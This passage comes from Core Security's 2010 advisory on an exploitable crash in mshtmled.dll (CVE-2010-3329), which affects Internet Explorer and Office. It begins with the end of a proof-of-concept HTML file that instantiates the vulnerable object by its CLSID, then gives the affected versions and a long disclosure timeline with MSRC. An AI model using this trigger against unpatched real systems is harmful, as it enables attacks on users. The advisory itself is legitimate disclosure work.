v:ext=\"edit\" shapetype=\"t\"/>\n </v:shapetype><v:shape id=\"_x0000_s1025\" type=\"#_x0000_t201\"\nstyle='position:absolute;\n margin-left:0;margin-top:0;width:48pt;height:12.75pt;z-index:1'\n strokecolor=\"windowText [64]\" o:insetmode=\"auto\">\n <![if gte mso 9]><o:title=\"\"/>\n <![endif]><x:ClientData ObjectType=\"Pict\">\n <x:SizeWithCells/>\n <x:CF>Pict</x:CF>\n <x:AutoPict/>\n </x:ClientData>\n </v:shape><![endif]--><![if !vml]><span style='mso-ignore:vglayout;\n position:absolute;z-index:1;margin-left:0px;margin-top:0px;width:64px;\n height:17px'><![endif]>\n\n<object classid=\"CLSID:3050F4E1-98B5-11CF-BB82-00AA00BDCE0B\"\nid=obj></object>\n\n<![if !vml]></span><![endif]><span\n style='mso-ignore:vglayout2'>\n <table cellpadding=0 cellspacing=0>\n <tr>\n <td height=17 width=64 style='height:12.75pt;width:48pt'></td>\n </tr>\n </table>\n </span></td>\n </tr>\n <![if supportMisalignedColumns]>\n <tr height=0 style='display:none'>\n <td width=64 style='width:48pt'></td>\n </tr>\n <![endif]>\n</table>\n</body>\n</html>\n\n-----/\n\n\nThis exploitable condition was reproduced in the following versions of\n'mshtmled.dll':\n\n . 'mshtmled.dll' v8.0.6001.18702\n . 'mshtmled.dll' v8.0.6001.18000\n . 'mshtmled.dll' v7.0.6000.17023\n . 'mshtmled.dll' v7.0.6000.17080\n\n\n8. *Report Timeline*\n\n. 2010-05-28:\nInitial notification to the vendor. Draft advisory and proof-of-concept\nfiles sent to MSRC. Publication date set for July 13, 2010.\n\n. 2010-06-11:\nCore requests from the vendor an update on the status of this case.\n\n. 2010-06-14:\nThe vendor responds that its engineers are still investigating this\nissue; and that they expect to have more information from the\ninvestigation and triage process within the next few days.\n\n. 2010-06-15:\nThe vendors informs that they have been determined that the ActiveX\ncontrol is marked as \"Not Safe for Initialization\"; and prompts the user\nwith a dialog that warns the user that they are going to be executing a\npotentially malicious code. In consequence, the vendor treats this case\nas the same scenario as a user that tries to enable and open an Office\ndocument with a Macro or VBA code contained within.\n\n. 2010-06-15:\nCore asks the vendor if the previous mail means that it does not intent\nto fix the bug or that it does not recognize it as a security issue. The\nreporter's viewpoint is that a dialog prompt is not a fix \"per se\" and\njust a defense in depth mechanism; and that he would prefer to see the\nbug fixed rather than relying on mitigations that prevent exploitation.\n\n. 2010-06-15:\nCore adds the following information: in Office 2003 even if the user\nanswers No to the ActiveX dialog, the application ends up crashing.\n\n. 2010-06-16:\nVendor responds that it is currently investigating the new information.\n\n. 2010-06-28:\nVendor informs that it has found that the vulnerable code actually\nexists and is owned by the IE team whom is currently investigating the\ncrash; and that this case is transferred over to them (and to a new case\nmanager as well).\n\n. 2010-07-02:\nVendor informs Core that the IE team has finished the investigation into\nthis issue and was able to reproduce the issue reported. During the\ninvestigation it was determined that this is an exploitable crash in\nInternet Explorer. Vendor will send Core the list of affected Internet\nExplorer versions when available.\n\n. 2010-07-02:\nCore acknowledges receipt of the update, and reminds that although the\nvulnerable code is owned by the IE team this also affects Office\n(including 2010). Core offers to postpone publication of its advisory\nfrom July 13th to August 10th on the basis of a firm commitment to a\nrelease date from the vendor's side. Core informs that it is evaluating\nthe possibility of using Office killbit recently introduced by MS10-036\nas a workaround, but that MS10-036 points to a knowledge base article\n[2] that is no longer available.\n\n. 2010-07-07:\nVendor acknowledges previous mail, and states that it will determine\nwith the product team how this fix could be included in the August\nrelease. Vendor requests an updated version of the advisory, and to\ninclude a vendor statement.\n\n. 2010-07-22:\nCore requests an update on the status of the vulnerability report; and\ninforms that publication of its advisory has been rescheduled to August\n10, 2010, despite the fact that Core did not receive any updates. Core\ninforms that the publication of this advisory is transferred to a new\ncase manager.\n\n. 2010-08-04:\nCore sends an updated version of the advisory and also asks if MSRC can\nprovide:\n 1. The list of affected software versions.\n 2. The CVE number assigned to this vulnerability (if it exists).\n 3. The steps to reproduce the vulnerability in IE [3].\n 4. The link to the knowledge base article about the newly introduced\nOffice killbit given that Core is investigating using that defense\nmechanism as a workaround but MS10-036 points to a knowledge base\narticle that is no longer available\n([http://support.microsoft.com/kb/983632]).\n\n Core also notifies this advisory is currently scheduled to be published\non August 10, 2010 but the publication can be reviewed if Microsoft\nresponds with a firm commitment to a release date of fixes, and\ntechnical information about the root cause of this vulnerability.\n\n. 2010-08-04:\nMSRC responds that the updated advisory draft was internally forwarded\nand they are working on collecting answers to the requested questions.\n\n. 2010-08-05:\nMSRC sends the answers to the asked questions:\n 1. The affected versions of Internet Explorer are IE6 [4], IE7 and IE8.\n 2. MSRC is unable to assign a CVE as it is too early. CVEs are\ntypically assigned closer to the scheduled release date and MSRC will\nreceive the block of CVEs from Mitre for the October release of the\nInternet Explorer security update.\n 3. MSRC notifies there is no attack vector in IE, and they cannot\nprovide steps to reproduce the vulnerability in IE.\n 4. The knowledge base article about the newly introduced Office\nkillbit was redirected to [http://support.microsoft.com/kb/2252664].\n\n. 2010-08-06:\nCore asks MSRC to clarify if the fix for this issue has been scheduled\nto be released in October.\n\n. 2010-08-06:\nMSRC confirms that the fix for this issue is scheduled for the October\nrelease of IE.\n\n. 2010-08-09:\nCore re-schedules the publication of the advisory for October 12 and\nnotifies that this date should be considered as final, if Microsoft does\nnot release fixes on that date, the advisory will be released as 'user\nrelease'.\n\n. 2010-08-09:\nMSRC confirms that the fix for this issue is scheduled for the October\nrelease of IE.\n\n. 2010-10-01:\nMSRC provides a status update about this issue and notifies that it is\nslated to be included in the October release of the IE Cumulative Update\nand SafeHTML update scheduled for October 12, 2010. MSRC also notifies\nthat the CVE assigned to this issue is CVE-2010-3329.\n\n. 2010-10-01:\nMSRC notifies that they have made a mistake and included an invalid\ndetail in the last status update. In particular, the issue does not\naffect the SafeHTML update scheduled for October but it will be shipping\nin the IE Cumulative Update scheduled for October.\n\n. 2010-10-01:\nCore acknowledges the MSRC's e-mail and notifies that although the\nproblem is located in IE-owned code, the problem also affects Office up\nto 2010. Core assumes this will be specified in the MSRC bulletin and\nasks for confirmation.\n\n. 2010-10-04:\nMSRC confirms that the description of the vulnerability calls out that\nthe vector to the vulnerability is through opening a word document.\n\n. 2010-10-12:\nAdvisory CORE-2010-0517 is published.\n\n\n9. *References*\n\n[1] Microsoft security bulletin summary for October 2010 -\n[http://www.microsoft.com/technet/security/bulletin/ms10-oct.mspx].\n[2] Office killbit [http://support.microsoft.com/kb/983632].\n[3] This bug was originally investigated in Microsoft Office by Core,\nbut MSRC determined [2010-07-02] that this bug is an exploitable crash\nin Internet Explorer.\n[4] MSRC was not able to reproduce this issue on IE6, however they\nnotifies the code has been determined to exist in this version and the\nfix will be scoped to address this platform as well.\n\n\n10. *About CoreLabs*\n\nCoreLabs, the research center of Core Security Technologies, is charged\nwith anticipating the future needs and requirements for information\nsecurity technologies. We conduct our research in several important\nareas of computer security including system vulnerabilities, cyber\nattack planning and simulation, source code auditing, and cryptography.\nOur results include problem formalization, identification of\nvulnerabilities, novel solutions and prototypes for new technologies.\nCoreLabs regularly publishes security advisories, technical papers,\nproject information and shared software tools for public use at:\n[http://corelabs.coresecurity.com/].\n\n\n11. *About Core Security Technologies*\n\nCore Security Technologies develops strategic solutions that help\nsecurity-conscious organizations worldwide develop and maintain a\nproactive process for securing their networks. The company's flagship\nproduct, CORE IMPACT, is the most comprehensive product for performing\nenterprise security assurance testing. CORE IMPACT evaluates network,\nendpoint and end-user vulnerabilities and identifies what resources are\nexposed. It enables organizations to determine if current security\ninvestments are detecting and preventing attacks. Core Security\nTechnologies augments its leading technology solution with world-class\nsecurity consulting services, including penetration testing and software\nsecurity auditing. Based in Boston, MA and Buenos Aires, Argentina, Core\nSecurity Technologies can be reached at 617-399-6980 or on the Web at\n[http://www.coresecurity.com].\n\n\n12. *Disclaimer*\n\nThe contents of this advisory are copyright (c) 2010 Core Security\nTechnologies and (c) 2010 CoreLabs, and are licensed under a Creative\nCommons Attribution Non-Commercial Share-Alike 3.0 (United States)\nLicense: [http://creativecommons.org/licenses/by-nc-sa/3.0/us/]\n\n\n13. *PGP/GPG Keys*\n\nThis advisory has been signed with the GPG key of Core Security\nTechnologies advisories team, which is available for download at\n[http://www.coresecurity.com/files/attachments/core_security_advisories.asc].", "sourceHref": "https://gitlab.com/exploit-database/exploitdb/-/raw/main/exploits/windows/dos/15262.txt", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}]}